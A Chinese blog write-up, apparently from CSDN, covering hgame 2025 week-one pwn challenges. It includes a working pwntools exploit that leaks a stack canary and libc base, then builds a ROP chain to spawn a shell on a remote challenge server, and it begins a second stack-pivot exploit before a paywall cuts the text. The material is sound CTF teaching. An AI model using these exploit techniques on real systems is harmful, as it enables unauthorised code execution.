[hgame 2025 ]week1 pwn/crypto

石氏是时试

已于 2025-02-12 22:56:25 修改

阅读量763

点赞数 11

文章标签： CTF

于 2025-02-12 21:14:45 首次发布

本文链接：https://blog.csdn.net/weixin_52640415/article/details/145598991

版权

一共两周，第一周说难也不难说简单也不简单。

pwn

counting petals

数组v7长度17，输入16时v7[16+1]会发生溢出，溢出到v8,v9,将其改大，会输出canary和libc_start_main_ret的地址。第2次进来覆盖到返回地址写上ROP

from pwn import *
context(arch='amd64', log_level='debug')

libc = ELF('./libc.so.6')

#p = process('./vuln')
#gdb.attach(p, "b*0x555555555535\nc")
p = remote('node1.hgame.vidar.club', 30788)

p.sendlineafter(b"time?\n", b'16')
for i in range(15):
    p.sendlineafter(b" : ", b'0')

p.sendlineafter(b" : ", str((0x10<<32)+22).encode())
for i in range(6):
    p.sendlineafter(b" : ", b'-')

p.sendlineafter(b"Reply 1 indicates the former and 2 indicates the latter: ", b'1')
p.recvuntil(b"Let's look at the results.\n")
v = p.recvuntil(b"=", drop=True).decode().split(' + ')
print(v)
libc.address = int(v[18]) - 0x29d90
canary = int(v[16])
pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
print(f"{libc.address = :x} {canary = :x}")


p.sendlineafter(b"time?\n", b'16')
pay = [0]*15+[(0x10<<32)+22, canary,0,pop_rdi+1,pop_rdi,next(libc.search(b'/bin/sh')), libc.sym['system']]
for i in pay:
    p.sendlineafter(b" : ", str(i).encode())

p.sendlineafter(b"Reply 1 indicates the former and 2 indicates the latter: ", b'1')
p.sendline(b'cat flag')
p.interactive()
#flag{b945024b-f973-497c-30e4-c14722593da5}

ezstack

PIE没开，加载地址已知。溢出正好能覆盖到返回地址。

ssize_t __fastcall vuln(unsigned int a1)
{
  char buf[80]; // [rsp+10h] [rbp-50h] BYREF

  print(a1, &unk_402018);
  print(a1, "That's all.\n");
  print(a1, "Good luck.\n");
  return read(a1, buf, 0x60uLL);
}

先移栈到BSS，再利用0x50的空间写ROP泄露libc再读入后续的ORW

from pwn import *
context(arch='amd64', log_level='debug')

#20.04 focal libc-2.31
libc = ELF('./libc-2.31.so')
elf = ELF('./vuln')

leave_ret = 0x401426
pop_rdi = 0x0000000000401713

最低0.47元/天解锁文章